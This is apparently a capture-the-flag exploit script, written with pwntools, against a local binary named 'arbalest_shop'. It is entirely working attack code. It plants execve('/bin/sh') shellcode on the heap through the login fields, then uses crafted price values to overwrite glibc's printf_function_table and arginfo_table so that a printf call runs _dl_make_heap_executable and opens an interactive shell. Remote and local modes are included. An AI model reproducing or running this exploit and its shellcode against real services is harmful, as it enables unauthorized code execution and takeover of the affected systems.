exploit.py

from pwn import *
import argparse
import os
from subprocess import check_output

make_heap_exec = b'4205600' # addr of _dl_make_heap_executable

def reg( r, username, password ):
    # register
    r.recvuntil( b"> " )
    r.send( b"2\n" )
    r.recvuntil( b": " )
    r.send( username + b"\n" )
    r.recvuntil( b": " )
    r.send( password + b"\n"  )
    r.recvuntil( b"> " )

def login( r, username, password ):
    # login
    r.send( b"1\n" )
    r.recvuntil( b": " )
    r.send( username + b"\n"  )
    r.recvuntil( b": " )
    r.send( password + b"\n"  )

def sell( r, name, price, size=0 ):

    r.recvuntil( b"> " )
    r.send( b"3\n" ) # sell arablest
    r.recvuntil( b": " )
    
    if size == 0:
        r.send( str( len( name ) + 16 ).encode( 'utf-8' ) + b"\n" ) # name size
    else:
        r.send( str( size ).encode( 'utf-8' ) + b'\n' )

    r.recvuntil( b": " )     
    r.send( name + b"\n" ) # name
    r.recvuntil( b": " )
    r.send( price + b'\n' ) # price 

def change_price( p, idx, price ):
    r.recvuntil( b"> " )
    r.send( b"4\n" ) # change price
    r.recvuntil( b": " )
    r.send( str( idx ).encode( 'utf-8' ) + b'\n' ) # index
    r.recvuntil( b": " )
    r.send( price + b'\n' ) # new price


parser = argparse.ArgumentParser()
parser.add_argument("-d", help="Run exploit locally and attach debugger", action="store_true")
parser.add_argument("-r", help="Run exploit on remote service", action="store_true")
parser.add_argument("-e", help="Run binary", action="store_true")
args = parser.parse_args()

# SETTINGS #

LINK_LIBC = False
BINARY = "./arbalest_shop"
LIBC = ""
LD = ""
GDBSCRIPT = """
b *change_user_password
b *_dl_make_heap_executable
continue
"""

ip = "127.0.0.1"
port = 33063

# SETTINGS #

context.binary = BINARY
context.log_level = "INFO"
#context.terminal = ['tmux', 'splitw', '-h']

LIBC_FOLDER = os.path.dirname(LIBC)
elf = ELF(BINARY)
if LIBC != "":
    libc = ELF(LIBC)
else:
    libc = None

if LINK_LIBC:
    cmd = [LD, '--library-path', LIBC_FOLDER, BINARY]
else:
    cmd = [BINARY]

if LINK_LIBC:
    LIB_NUMBER = check_output(["ldd", BINARY]).count(b"(")
    GDBSCRIPT = """
        set stop-on-solib-events 1
    """ + "continue\n" * LIB_NUMBER + """
        set stop-on-solib-events 0
        file {}
    """.format(BINARY) + GDBSCRIPT

if args.d:
    r = gdb.debug(cmd, GDBSCRIPT)
elif args.r:
    r = remote(ip, port)
elif args.e:
    r = process(cmd)
    r.interactive()
    exit(0)
else:
    r = process(cmd)


shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

# SPLOIT #
reg( r, shellcode, shellcode )
login( r, shellcode, shellcode )

# main menu
for i in range( 0, 67 ):
    sell( r, shellcode, make_heap_exec )

offset = b'4925936'

# add arbalest wich rewrite prtinf_function_table
sell( r, b"test", offset )

# change price to add another arbalest
change_price( r, 67, b'0' )

# add arbalest wich rewrite arginfo_table   
sell( r, b"a", offset, 1024 )

# return valid addr of printf_function_table 
change_price( r, 67, offset )

r.send( b"7\n" ) # trigger vuln, and call _dl_make_heap_executable

r.interactive()

# __parse_one_specmb+1212